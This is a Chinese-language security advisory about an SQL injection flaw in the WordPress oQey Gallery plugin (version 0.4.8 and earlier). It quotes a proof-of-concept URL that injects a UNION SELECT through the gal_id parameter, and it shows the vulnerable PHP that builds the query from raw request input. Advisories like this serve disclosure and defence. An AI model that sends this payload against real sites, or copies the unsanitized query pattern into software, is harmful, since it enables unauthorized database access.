WordPress oQey Gallery <= 0.4.8插件SQL注入漏洞
发布日期:2011-09-05
更新日期:2011-09-05
受影响系统:WordPress WordPress 0.4.8
描述:
WordPress是一种使用PHP语言和MySQL数据库开发的Blog(博客、网志)引擎,用户可以在支持PHP和MySQL数据库的服务器上建立自己的Blog。
WordPress oQey Gallery版本<= 0.4.8的插件在实现上存在SQL注入漏洞,远程攻击者可利用此漏洞非授权操作数据库。
<*来源:Miroslav Stampar
链接:
http://www.exploit-db.com/exploits/17779/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Miroslav Stampar ()提供了如下测试方法:
# Exploit Title: WordPress oQey Gallery plugin <= 0.4.8 SQL Injection Vulnerability
# Date: 2011-09-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link:
http://downloads.wordpress.org/plugin/oqey-gallery.0.4.8.zip
# Version: 0.4.8 (tested)
# Note: magic_quotes has to be turned off
---
PoC
---
http://www.site.com/wp-content/plugins/oqey-gallery/getimages.php?gal_id=0' UNION ALL SELECT 1,2,3,4,5,6,7,CONCAT_WS(CHAR(95),version(),current_user(),database()),9,10%23
---------------
Vulnerable code
---------------
if(isset($_REQUEST['gal_id'])){
...
$data = explode("-", $_REQUEST['gal_id']);
$id = $data[0];
...
$s = $wpdb->get_row("SELECT * FROM $oqey_galls WHERE id ='".$id."' ");
建议:
厂商补丁:
WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://wordpress.org/浏览次数:4001
严重程度:0(网友投票)
